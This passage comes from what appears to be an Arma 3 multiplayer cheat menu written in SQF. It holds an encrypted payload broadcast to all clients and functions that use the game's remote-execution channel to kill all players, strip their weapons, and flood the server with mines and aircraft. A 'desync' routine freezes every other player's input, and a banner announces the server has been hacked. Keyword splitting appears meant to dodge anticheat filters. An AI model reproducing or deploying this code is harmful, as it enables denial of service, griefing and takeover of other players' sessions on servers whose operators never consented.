3838, 4060, 5353, 4956, 7474, 11960, 10815, 11880, 5076, 9999, 1984, 8550, 10092, 12543, 4592, 7080, 884, 840, 603, 8200, 3838, 3780, 5353, 4872, 7474, 13570, 10403, 12480, 4935, 9801, 6696, 9090, 2784, 10735, 4756, 13320, 7616, 4200, 3953, 1066, 380, 455, 530, 378, 8510, 12420, 10403, 12120, 5264, 3168, 3224, 4140, 4611, 6667, 533, 1200, 884, 840, 603, 7790, 3990, 1120, 3233, 1344, 3552, 6785, 1339, 1200, 423, 11781, 6448, 9450, 9396, 11413, 1312, 14760, 6460, 8820, 2144, 4920, 1216, 1715, 2544, 2016, 9250, 3680, 10300, 13320, 611, 990, 558, 11070, 1131, 1130, 369, 1080, 6460, 9072, 7035, 8446, 3952, 4060, 1696, 4830, 7474, 13340, 7828, 12600, 4841, 10296, 7192, 5940, 9918, 11865, 4223, 12480, 7888, 9240, 6767, 9430, 4370, 1120, 2597, 2016, 3552, 5290, 4944, 3840, 2115, 3168, 5890, 9450, 5133, 1469, 410, 1080, 612, 7980, 7035, 2624, 2318, 1120, 5035, 4410, 2368, 4945, 3296, 5880, 2773, 1287, 620, 810, 783, 12995, 4428, 12120, 6868, 9408, 2144, 3936, 1748, 1715, 3127, 546, 740, 1035, 12875, 7080, 611, 990, 558, 9000, 8787, 12204, 4141, 13920, 6868, 7224, 6767, 8528, 3990, 3465, 5724, 4242, 2368, 10925, 11124, 12600, 4841, 10296, 7192, 5310, 1131, 1130, 533, 1200, 612, 9660, 7236, 8282, 3838, 3920, 1696, 2100, 4366, 1495, 1030, 1560, 470, 891, 5890, 10350, 9483, 12543, 4387, 12120, 2176, 9660, 6767, 9512, 3040, 3395, 6042, 4872, 7770, 11385, 11124, 12120, 3760, 9603, 7068, 8730, 9483, 12995, 1312, 10920, 6188, 2856, 4355, 4182, 3496, 2380, 5141, 4872, 7178, 10925, 7210, 11040, 3760, 9603, 7068, 10440, 9135, 11187, 4428, 12120, 4692, 8568, 6834, 8282, 3762, 4060, 6095, 3864, 6290, 12650, 10815, 14160, 4747, 11286, 7130, 8730, 9396, 10396, 4797, 13200, 7140, 9912, 6767, 9348, 4370, 3395, 5724, 1932, 8288, 5865, 10300, 4080, 2068, 3168, 3038, 4860, 3828, 3616, 2255, 5280, 2176, 4368, 3752, 3608, 1216, 1715, 4929, 1848, 2368, 3910, 3502, 5280, 1504, 3366, 4092, 9450, 9396, 12204, 4018, 13320, 6596, 9576, 6700, 2788, 1672, 1120, 2597, 1848, 2368, 5750, 5459, 5280, 1504, 9009, 2976, 3960, 2784, 5424, 1804, 3840, 3264, 7812, 2948, 1066, 380, 315, 477, 378, 666, 1035, 9373, 5760, 2068, 3168, 2976, 3960, 2784, 5876, 2173, 11160, 2992, 2688, 3216, 3608, 1216, 1715, 2438, 2310, 3256, 3680, 5047, 5280, 1504, 4752, 2728, 2880, 7917, 5876, 1968, 5280, 3400, 4452, 2948, 4592, 1824, 3255, 2332, 1344, 962, 1150, 927, 1080, 423, 891, 558, 8190, 7917, 5537, 1804, 3840, 3332, 3696, 2144, 4018, 1672, 1120, 2544, 1932, 3700, 10695, 4532, 10920, 2303, 4356, 1984, 4410, 3828, 3616, 2009, 5280, 2176, 4032, 3082, 4182, 3534, 1540, 4823, 2058, 3256, 3680, 5047, 5280, 1504, 4851, 2728, 2880, 4176, 5198, 2091, 11160, 2992, 7644, 3283, 3608, 1216, 1715, 2332, 1344, 3626, 5060, 3296, 5760, 2162, 5049, 5766, 3960, 7917, 5537, 1804, 3840, 3332, 3696, 2144, 4018, 1672, 1120, 2544, 1932, 3774, 10695, 4532, 10920, 2303, 4356, 1984, 4410, 3828, 3616, 2009, 5280, 2176, 4032, 3082, 4182, 3534, 1540, 4823, 2058, 3256, 3680, 5047, 5280, 1504, 4851, 2728, 2880, 4176, 5198, 2091, 11160, 2992, 7644, 3283, 3608, 1216, 1715, 2332, 1344, 3626, 5060, 3296, 5760, 4371, 9207, 806, 900, 783, 1017, 369, 1080, 612, 3696, 2144, 7462, 1824, 1610, 2809, 1848, 2368, 5520, 4738, 5880, 4371, 4356, 1984, 4410, 3828, 3616, 2009, 5280, 2176, 2856, 2278, 3608, 1216, 1190, 1802, 1848, 2368, 12650, 12051, 12840, 4747, 11088, 6882, 10350, 8091, 6667, 533, 1200, 884, 840, 603, 7790, 2546, 3885, 5830, 4242, 2368, 13225, 10403, 13920, 3196, 11286, 6882, 10080, 6351, 12430, 4756, 12120, 7752, 9912, 6499, 8856, 1216, 1680, 2438, 2016, 3626, 6785, 1339, 1200, 423, 9405, 7130, 9810, 9657, 12091, 4141, 3840, 7820, 8484, 7772, 5576, 4332, 3885, 5936, 3066, 8140, 13340, 10403, 13680, 5546, 9603, 6696, 2880, 4176, 5198, 1968, 5760, 3672, 4956, 871, 820, 342, 3325, 4611, 4074, 8732, 11615, 3296, 13800, 4747, 11484, 4216, 10260, 9657, 12656, 2993, 13200, 7888, 8484, 7638, 9676, 3686, 3780, 1696, 2016, 3404, 5520, 4944, 5880, 2773, 1287, 620, 1170, 870, 1017, 4715, 12960, 6868, 8484, 7504, 2624, 1900, 2065, 689, 420, 962, 1150, 927, 11400, 5405, 10791, 6882, 9630, 8787, 3616, 4715, 12120, 7888, 6720, 6499, 9348, 4408, 3675, 5247, 4536, 7474, 9200, 9991, 13680, 4559, 10791, 7130, 2880, 7917, 10283, 1394, 7800, 3468, 7728, 4556, 7954, 4408, 3395, 5035, 2940, 6808, 9200, 9991, 13680, 5452, 10395, 6138, 9720, 8787, 7797, 4182, 12240, 6868, 8316, 7772, 9430, 3496, 2975, 5830, 4410, 8732, 11615, 11742, 13800, 4559, 10692, 5704, 10530, 9570, 11865, 4838, 12120, 7752, 9660, 6499, 8856, 1748, 3920, 2703, 4200, 2516, 5060, 3296, 5880, 2538, 4356, 1984, 4950, 3828, 3616, 2132, 6720, 2992, 2688, 3283, 7626, 1672, 1120, 1802, 1428, 3256, 3680, 3502, 7920, 4935, 10692, 6696, 8820, 9657, 10961, 4674, 12000, 2312, 3696, 2144, 4018, 1672, 1120, 2650, 2226, 3256, 3680, 9373, 5760, 2068, 3168, 2976, 3960, 2784, 5424, 3813, 5280, 884, 840, 603, 738, 342, 315, 477, 3822, 3552, 5060, 3296, 5760, 2068, 3168, 3162, 4320, 8091, 4972, 1312, 5760, 2992, 2688, 3283, 3772, 2090, 1540, 1696, 2058, 3256, 3680, 4944, 5280, 1504, 9009, 3224, 4320, 3828, 5650, 2173, 5280, 3808, 4032, 6231, 3608, 1216, 455, 530, 378, 666, 1035, 927, 1080, 4277, 9009, 3038, 3960, 2784, 5537, 1804, 3840, 3332, 3696, 2144, 3936, 1748, 1750, 4929, 1848, 6734, 5635, 4532, 3840, 2303, 4356, 1984, 4410, 3828, 3616, 1968, 5520, 3468, 7812, 2948, 7462, 1862, 1540, 1696, 2058, 3256, 3680, 5047, 5280, 1504, 4752, 2852, 4590, 8091, 4972, 3731, 5880, 2992, 2688, 3283, 3608, 1216, 1715, 2332, 1344, 3552, 5290, 5253, 11160, 2068, 9009, 3038, 3960, 2784, 5537, 1804, 3840, 3332, 3696, 2144, 3936, 1748, 1785, 4929, 1848, 6734, 5635, 4532, 3840, 2303, 4356, 1984, 4410, 3828, 3616, 1968, 5520, 3468, 7812, 2948, 7462, 1862, 1540, 1696, 2058, 3256, 3680, 5047, 5280, 1504, 4752, 2852, 4590, 8091, 4972, 3731, 5880, 2992, 2688, 3283, 3608, 1216, 1715, 2332, 1344, 3552, 10695, 9579, 1560, 470, 891, 558, 810, 783, 1017, 1804, 3840, 6188, 4032, 3082, 4346, 1672, 1120, 2544, 1932, 3626, 10695, 4532, 3840, 2303, 4356, 1984, 4410, 3828, 3616, 1394, 4080, 2992, 2688, 2278, 2788, 1672, 1120, 5830, 4914, 7918, 11615, 11536, 13320, 5405, 9207, 3658, 1170, 870, 1017, 3895, 13800, 7412, 9324, 7169, 8282, 1216, 4025, 5353, 4872, 5032, 13110, 11433, 13440, 3431, 10890, 7192, 9090, 9918, 13334, 3977, 12960, 2176, 4032, 3082, 3936, 1862, 1750, 3127, 546, 740, 1035, 9785, 8040, 5217, 10890, 6262, 2880, 10005, 11413, 4756, 8160, 7752, 9324, 7504, 5986, 4180, 4060, 5353, 4788, 8732, 11155, 11124, 3840, 2256, 4554, 2976, 4500, 5133, 1469, 410, 1080, 6460, 7308, 6499, 9676, 3838, 1120, 6095, 4242, 8584, 7820, 11742, 13320, 5264, 7227, 6820, 10440, 8787, 12882, 4838, 11640, 7344, 2688, 3216, 3772, 1824, 1715, 3127, 546, 740, 1495, 1030, 1080, 5405, 10692, 6262, 9090, 9744, 3616, 2009, 6360, 4012, 1092, 670, 738, 3800, 3535, 5724, 4242, 8584, 11615, 8858, 12120, 4888, 10395, 6138, 9720, 8787, 3616, 3895, 10440, 6596, 9912, 6767, 4838, 494, 350, 477, 4200, 7474, 12420, 10403, 13920, 4747, 8514, 6262, 9360, 9135, 11187, 4428, 12120, 2176, 7980, 6633, 9102, 4180, 3535, 3127, 546, 740, 1035, 10300, 12120, 5076, 9999, 7192, 9090, 7482, 11413, 4264, 12600, 6732, 9072, 6767, 2624, 3610, 4025, 5777, 4662, 7918, 11615, 6077, 1560, 470, 891, 6200, 9090, 9396, 11413, 4756, 12120, 8024, 8484, 6968, 8610, 3762, 3780, 5353, 1344, 8140, 13455, 11021, 12120, 5264, 10989, 7130, 5310, 1131, 1130, 369, 10920, 6324, 2688, 7705, 9184, 3686, 4165, 5830, 1344, 9102, 1495, 1030, 1080, 423, 10395, 6324, 3600, 9483, 11300, 4264, 11400, 7480, 9828, 7169, 8282, 3610, 3990, 5353, 4578, 8214, 13570, 10403, 11880, 5217, 11286, 7068, 9090, 8613, 13108, 4305, 13320, 7480, 2688, 4154, 2624, 1824, 1435, 1696, 4872, 7696, 11615, 11330, 3840, 5781, 1287, 620, 810, 783, 1017, 4715, 12960, 6868, 8484, 7504, 2624, 1900, 1855, 3127, 546, 740, 1035, 927, 1080, 1598, 9801, 6882, 9720, 9657, 12882, 2747, 13320, 7752, 9576, 6767, 8118, 4408, 3675, 5883, 4620, 8510, 3910, 3296, 13440, 5264, 6831, 6324, 9180, 8787, 11187, 4756, 7800, 6800, 8904, 7839, 9430, 4408, 1120, 4823, 2058, 3256, 3680, 5047, 5280, 1504, 4752, 2728, 2880, 7917, 5537, 1804, 3840, 3332, 3696, 2144, 4018, 1672, 1120, 2544, 1932, 3552, 10695, 4532, 3840, 4277, 4851, 2728, 2880, 4263, 4972, 1312, 5880, 2992, 2688, 3283, 7626, 1672, 1120, 1696, 3822, 3626, 5060, 3296, 5880, 2068, 3168, 3038, 3960, 2784, 5424, 1886, 5760, 6324, 7812, 3953, 1066, 380, 315, 477, 378, 2516, 11385, 11433, 12960, 5217, 11286, 4154, 9990, 9918, 12882, 4141, 11880, 7888, 8820, 7437, 9020, 4370, 1190, 1696, 4704, 8288, 7935, 10506, 12240, 4747, 9801, 7192, 6030, 9657, 12317, 4469, 12600, 7888, 2688, 3216, 4838, 494, 350, 477, 378, 666, 3910, 10506, 12600, 5076, 10791, 4402, 10260, 8439, 11865, 4510, 4080, 2176, 9408, 7504, 5658, 3876, 3570, 5353, 4158, 8584, 7935, 11330, 11640, 4606, 10692, 6262, 2880, 8874, 10961, 4428, 13800, 6868, 4956, 871, 820, 342, 315, 477, 1428, 7548, 12075, 11124, 13080, 3337, 11286, 6014, 9450, 9570, 3842, 1312, 13440, 7616, 5796, 6834, 8364, 3838, 3465, 6148, 2814, 8214, 12535, 11227, 12600, 5452, 3168, 2976, 5310, 1131, 1130, 369, 1080, 8500, 4956, 871, 820, 342, 4375, 3127, 546, 740, 1035, 10815, 12240, 1880, 10791, 6200, 9360, 8265, 12430, 4797, 12840, 6868, 7980, 7638, 8282, 4142, 3885, 6254, 4242, 7178, 13225, 10712, 3840, 2914, 3168, 2976, 3690, 2784, 13108, 4264, 12120, 7480, 2688, 8241, 1066, 380, 315, 477, 4830, 7992, 11615, 10403, 13440, 1504, 4950, 3286, 5310, 1131, 1130, 369, 1080, 6800, 8484, 7236, 8282, 4408, 3535, 6254, 4242, 7696, 12075, 10197, 12960, 4747, 3168, 6758, 9000, 9048, 10735, 3977, 13800, 7072, 4956, 871, 820, 342, 4375, 3127, 546, 740, 14375, 6077] call _Decrypt);
  2111. };
  2112. [_clients,"bis_fnc_Spawn",true,false] call mp_runFunc;
  2113. hintSilent parseText "<t size=""1.2"">Loading Nuke Functions...</t><br/><t size=""0.9"">The Map Will Open Once The Map Functions are Loaded!</t>";
  2114. onMapSingleClick "[_pos,""DO_NUKE"",true,false] spawn mp_runFunc;openMap [false,false];onMapSingleClick"""";";
  2115. };
  2116. GEF_Nyan = {
  2117. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2118. if(GEF_NyanCat_Toggle) then {
  2119. hint "THE NYANS HAVE ARRIVED!";
  2120. _sCode = " _fnc_scriptName = if (isnil ""_fnc_scriptName"") then {""Functions Init""} else {_fnc_scriptName};while {GEF_NyanCat_Toggle} do {";
  2121. _sCode = _sCode + "LY_Flare = ""SmokeShell"" create" + "Vehicle position vehicle player;LY_Flare attachTo [vehicle player,[0,0,0]];";
  2122. _sCode = _sCode + "LY_Flare1 = ""Smokeshellpurple"" create" + "Vehicle position vehicle player;LY_Flare1 attachTo [vehicle player,[0.1,0,0]];";
  2123. _sCode = _sCode + "LY_Flare2 = ""Smokeshellgreen"" create" + "Vehicle position vehicle player;LY_Flare2 attachTo [vehicle player,[0.2,0,0]];";
  2124. _sCode = _sCode + "LY_Flare3 = ""Smokeshellpurple"" create" + "Vehicle position vehicle player;LY_Flare3 attachTo [vehicle player,[0.3,0,0]];";
  2125. _sCode = _sCode + "LY_Flare4 = ""Smokeshellgreen"" create" + "Vehicle position vehicle player;LY_Flare4 attachTo [vehicle player,[0.4,0,0]];";
  2126. _sCode = _sCode + "LY_Flare5 = ""Smokeshellgreen"" create" + "Vehicle position vehicle player;LY_Flare5 attachTo [vehicle player,[0.5,0,0]];";
  2127. _sCode = _sCode + "LY_Flare6 = ""Smokeshellgreen"" create" + "Vehicle position vehicle player;LY_Flare6 attachTo [vehicle player,[0.6,0,0]];";
  2128. _sCode = _sCode + "LY_Flare7 = ""SmokeShellRed"" create" + "Vehicle position vehicle player;LY_Flare7 attachTo [vehicle player,[0.7,0,0]];";
  2129. _sCode = _sCode + "LY_Flare8 = ""SmokeShellRed"" create" + "Vehicle position vehicle player;LY_Flare8 attachTo [vehicle player,[0.8,0,0]];";
  2130. _sCode = _sCode + "sleep 28;};";
  2131. [] spawn compile _sCode;
  2133. } else {
  2134. sleep 0.5;
  2135. deleteVehicle LY_Flare;
  2136. deleteVehicle LY_Flare1;
  2137. deleteVehicle LY_Flare2;
  2138. deleteVehicle LY_Flare3;
  2139. deleteVehicle LY_Flare4;
  2140. deleteVehicle LY_Flare5;
  2141. deleteVehicle LY_Flare6;
  2142. deleteVehicle LY_Flare7;
  2143. deleteVehicle LY_Flare8;
  2144. hint "The Nyans Have left you!";
  2145. };
  2146. };
  2147. GEF_BBullets = {
  2148. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2149. if (GEF_BBulletGEF_Toggle) then
  2150. {
  2151. vehicle player removeAllEventHandlers "Fired";
  2152. cutText [" \nBig Fuckin Bullets Loaded..","PLAIN"];
  2153. vehicle player addeventhandler ["Fired",{call BigFuckinBulletGEF_Peter_cus} ];
  2155. BigFuckinBulletGEF_Peter_cus =
  2156. {
  2157. if (isNull cursorTarget) then
  2158. {
  2159. TargetPlayer_peter_cus = screenToWorld [0.5,0.5];
  2160. }
  2161. else
  2162. {
  2163. TargetPlayer_peter_cus = getpos cursorTarget;
  2164. };
  2165. call compile (" _fnc_scriptName = if (isnil ""_fnc_scriptName"") then {""Functions Init""} else {_fnc_scriptName};_spwnboom_cus = ""Helicopter" + "ExploBig"" createVe" + "hiclelocal TargetPlayer_peter_cus");
  2167. };
  2168. }
  2169. else
  2170. {
  2171. cutText [" \nBack to Normal Bullets..","PLAIN"];
  2172. vehicle player removeAllEventHandlers "Fired";
  2173. };
  2174. };
  2175. GEF_TimeDay = {
  2176. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2177. [{ _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};setDate [2012, 9, 1, 9, 0];},true] call GEF_Rmote;
  2178. hint "Day Time!";
  2179. };
  2180. GEF_TimeNight = {
  2181. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2182. [{ _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};setDate [2012, 9, 1, 21, 0];},true] call GEF_Rmote;
  2183. hint "Night Time!";
  2184. };
  2185. GEF_Rocket = {
  2186. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2187. svr_rocket = {
  2188. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2189. _pos = _this;
  2190. _code = {
  2191. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2192. server_createRocket = {
  2193. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2194. _pos = _this;
  2195. _X = _pos select 0;
  2196. _Y = _pos select 1;
  2197. _tH = getTerrainHeightASL [_X,_Y];
  2198. _nH = 0;
  2199. _unit = createAgent ["O_Soldier_F", [_X,_Y,_nH+5], [], 0, "NONE"];
  2200. hideObjectGlobal _unit;
  2201. _ship1 = createVehicle ["Land_Lighthouse_F", [_X,_Y,_nH+5],[],0,"CAN_COLLIDE"];
  2202. _ship1 allowDamage false;
  2203. _ship1 attachTo [_unit,[0,3.25,10]];
  2204. _unit allowDamage false;
  2205. _unit setPosASL [_X,_Y,_tH];
  2206. [_unit,_X,_Y] spawn {
  2207. sleep 2;
  2208. runcode = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName}; {hint "We Have liftoff!";} spawn bis_fnc_Spawn; };
  2209. publicVariable "runcode";
  2210. skip = 0;
  2211. _X = _this select 1;
  2212. _Y = _this select 2;
  2213. while{true} do {
  2214. (_this select 0) setVelocity [0,0,15];
  2215. if(skip % 3 == 0) then {
  2216. _Z = (getposasl (_this select 0)) select 2;
  2217. (_this select 0) setPosASL [_X,_Y,_Z];
  2218. };
  2219. };
  2220. };
  2221. [_X,_Y,_tH] spawn {
  2222. _X = _this select 0;
  2223. _Y = _this select 1;
  2224. _tH = _this select 2;
  2225. for "_i" from 0 to 1000 do {
  2226. _nH = 0.3*_i + _tH;
  2227. _object = createMine ["APERSMine",[_X,_Y,_nH],[],0];
  2228. _object setPosASL [_X,_Y,_nH];
  2229. _object setvectorup [0,0,1];
  2230. };
  2231. };
  2232. };
  2233. };
  2234. _client = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};"runcode" addPublicVariableEventhandler {[] spawn (_this select 1);};};
  2235. [_client,true] call GEF_Rmote;
  2236. [_code,false] call GEF_Rmote;
  2237. sleep 2;
  2238. _code = (' _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};' + (str _pos) + " spawn server_createRocket;");
  2239. [_code,false] call GEF_Rmote;
  2240. };
  2241. openMap [true,false];
  2242. onMapSingleClick "_pos spawn svr_rocket;openMap [false, false];onMapSingleClick """";false";
  2243. };
  2244. GEF_Kamakazi_50 = {
  2245. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2246. kamakazi_lystic = {
  2247. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2248. _code = {
  2249. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2250. call compile ('
  2251. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2252. kamakazi_server = {
  2253. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2254. _number = _this select 0;
  2255. _pos = _this select 1;
  2256. _entity = "I_Plane_Fighter_03_AA_F";
  2257. _obj = _entity create' + 'Vehicle _pos;
  2258. _pos = _obj model' + 'ToWorld [0,0,400];
  2259. for "_i" from 0 to _number do{
  2260. _pos set[0, (_pos select 0)+ (random (50)-25)];
  2261. _pos set[1, (_pos select 1)+ (random (50)-25)];
  2262. _obj = _entity creat' + 'eVehicle [0,0,0];
  2263. _obj setPo' + 's _pos;
  2264. _obj setV' + 'elocity [random(150)-75,random(150)-75,0];
  2265. sleep 0.25;
  2266. };
  2267. };
  2268. ');
  2269. };
  2270. [_code,false] call GEF_Rmote;
  2271. _code = (' _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};' + str [50,_this] + " spawn kamakazi_server;");
  2272. [_code,false] call GEF_Rmote;
  2273. hint 'Kamakazi!';
  2274. };
  2275. openMap [true,false];
  2276. onMapSingleClick "_pos spawn kamakazi_lystic;openMap [false, false];onMapSingleClick '';false";
  2277. };
  2278. GEF_Kamakazi_100 = {
  2279. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2280. kamakazi_lystic = {
  2281. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2282. _code = {
  2283. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2284. call compile (' _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2285. kamakazi_server = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2286. _number = _this select 0;
  2287. _pos = _this select 1;
  2288. _entity = "I_Plane_Fighter_03_AA_F";
  2289. _obj = _entity create' + 'Vehicle _pos;
  2290. _pos = _obj model' + 'ToWorld [0,0,400];
  2291. for "_i" from 0 to _number do{
  2292. _pos set[0, (_pos select 0)+ (random (50)-25)];
  2293. _pos set[1, (_pos select 1)+ (random (50)-25)];
  2294. _obj = _entity creat' + 'eVehicle [0,0,0];
  2295. _obj setPo' + 's _pos;
  2296. _obj setV' + 'elocity [random(150)-75,random(150)-75,0];
  2297. sleep 0.25;
  2298. };
  2299. };
  2300. ');
  2301. };
  2302. [_code,false] call GEF_Rmote;
  2303. _code = (' _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};' + str [100,_this] + " spawn kamakazi_server;");
  2304. [_code,false] call GEF_Rmote;
  2305. hint 'Kamakazi!';
  2306. };
  2307. openMap [true,false];
  2308. onMapSingleClick "_pos spawn kamakazi_lystic;openMap [false, false];onMapSingleClick '';false";
  2309. };
  2310. GEF_Kamakazi_500 = {
  2311. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2312. kamakazi_lystic = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2313. _code = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2314. call compile (' _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2315. kamakazi_server = { _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2316. _number = _this select 0;
  2317. _pos = _this select 1;
  2318. _entity = "I_Plane_Fighter_03_AA_F";
  2319. _obj = _entity create' + 'Vehicle _pos;
  2320. _pos = _obj model' + 'ToWorld [0,0,400];
  2321. for "_i" from 0 to _number do{
  2322. _pos set[0, (_pos select 0)+ (random (50)-25)];
  2323. _pos set[1, (_pos select 1)+ (random (50)-25)];
  2324. _obj = _entity creat' + 'eVehicle [0,0,0];
  2325. _obj setPo' + 's _pos;
  2326. _obj setV' + 'elocity [random(150)-75,random(150)-75,0];
  2327. sleep 0.25;
  2328. };
  2329. };
  2330. ');
  2331. };
  2332. [_code,false] call GEF_Rmote;
  2333. _code = (' _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};' + str [500,_this] + " spawn kamakazi_server;");
  2334. [_code,false] call GEF_Rmote;
  2335. hint 'Kamakazi!';
  2336. };
  2337. openMap [true,false];
  2338. onMapSingleClick "_pos spawn kamakazi_lystic;openMap [false, false];onMapSingleClick '';false";
  2339. };
  2340. GEF_NewsBanner = {
  2341. [{ _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};call compile ("LY_fnc_NEWS = bis_f" + "nc_AAN");},true] call GEF_Rmote;
  2342. waituntil{!isNil "LY_fnc_NEWS"};
  2343. [{ _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2344. [parseText "
  2345. <t size='2.1' color='#CA278C'>Your server has just been HACKED!</t><br/>
  2346. <t color='#CA278C'>Announcement!</t>",parseText "
  2347. <t size='1.5' color='#FE2E2E'>Thank your scrub admins! </t>
  2348. <t size='1.5' color='#FACC2E'>If only they had a reliable anticheat </t>
  2349. <t size='1.5' color='#80FF00'>But all they care about is your money! </t>
  2350. <t size='1.5' color='#00FF00'>Maybe You Should find a better community! </t>
  2351. <t size='1.5' color='#2EFE9A'>My Menu! </t>
  2352. <t size='1.5' color='#00FFFF'>My Menu! </t>
  2353. <t size='1.5' color='#0174DF'>My Menu! </t>
  2354. <t size='1.5' color='#013ADF'>Is </t>
  2355. <t size='1.5' color='#3A01DF'>The </t>
  2356. <t size='1.5' color='#A901DB'>Best </t>
  2357. <t size='1.5' color='#DF0174'>Arma 3 </t>
  2358. <t size='1.5' color='#00FFFF'>Menu! </t>"] spawn LY_fnc_NEWS;
  2359. },true]call GEF_Rmote;
  2360. };
  2361. GEF_Desync = {
  2362. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2363. _Code = format[" _fnc_scriptName = if (isnil ""_fnc_scriptName"") then {""Functions Init""} else {_fnc_scriptName};
  2364. if(isServer) then {
  2365. _pos = [1894,2520,100];
  2366. _col = 179;
  2367. _row = 182;
  2369. _first_notactually = _pos select 0;
  2370. _second_notactually = _pos select 1;
  2371. _third_notactually = _pos select 2;
  2372. _doesnt_do_anything = _pos select 0;
  2373. _setsecond_wat = _pos select 1;
  2374. _why_iGEF_thiGEF_here_evn_lol = _pos select 2;
  2375. _pos2_peter = [_first_notactually, _second_notactually, _third_notactually];
  2378. for '_i' from 1 to _col do {
  2379. _second_notactually = _setsecond_wat;
  2380. _pos2_peter = [_first_notactually, _second_notactually, _third_notactually];
  2381. for '_j' from 1 to _row do {
  2382. _pos2_peter = [_first_notactually, _second_notactually, _third_notactually];
  2383. _object = create" + "Vehicle ['B_Heli_Light_01_F', _pos2_peter, [], 0, 'CAN_COLLIDE'];
  2384. _second_notactually = _second_notactually + 5;
  2385. };
  2386. _first_notactually = _first_notactually + 5;
  2387. };
  2388. }"];
  2389. [COMPILE _code,false] call GEF_Rmote;
  2390. _code = format[" _fnc_scriptName = if (isnil ""_fnc_scriptName"") then {""Functions Init""} else {_fnc_scriptName};
  2391. if(name player != '%1') then {
  2392. while {true} do {
  2393. disableUserInput true;
  2394. };
  2395. } else {
  2396. ['TaskSucceeded',['','Desync In Progress!']] call bis_fnc_showNotification;
  2397. };
  2398. ",name player];
  2399. [COMPILE _code,true] call GEF_Rmote;
  2400. };
  2401. GEF_ODST = {
  2402. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2403. _xx = 0;
  2404. _y = 0;
  2405. while {_y < 5650} do{
  2406. _y = (random 5700);
  2407. };
  2408. while {_xx < 1700} do{
  2409. _xx = (random 1780);
  2410. };
  2411. _pos = getPos Player;
  2412. _pos = [_pos select 0, _pos select 1, -100];
  2413. _aim_peter = (vehicle player);
  2414. if (true) then
  2415. {
  2416. _aim_peter setPosASL _pos;
  2417. };
  2418. _pos = [_xx, _y, 2000];
  2419. if (true) then
  2420. {
  2421. _aim_peter setPosASL _pos;
  2422. };
  2423. {
  2424. _xx = random 50;
  2425. _y = random 50;
  2426. if(name _x != name player) then {
  2427. _x attachTo [player,[_xx,_y,0]];
  2428. };
  2429. }forEach playableUnits;
  2430. sleep 2;
  2431. {
  2432. if(name _x != name player) then {
  2433. detach _x;
  2434. };
  2435. }forEach playableUnits;
  2436. };
  2437. GEF_KillAll = {
  2438. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2439. [{ _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};player setDamage 1;},true] call GEF_Rmote;
  2440. };
  2441. GEF_RemoveWeaponsAll = {
  2442. [{ _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};removeAllWeapons player;},true] call GEF_Rmote;
  2443. };
  2444. GEF_TPAll = {
  2445. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2446. {
  2447. _x setPosatl (getposatl player);
  2448. } forEach playableUnits;
  2449. };
  2450. GEF_CleanUp = {
  2451. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2452. {
  2453. if (count(crew _x) == 0) then
  2454. {
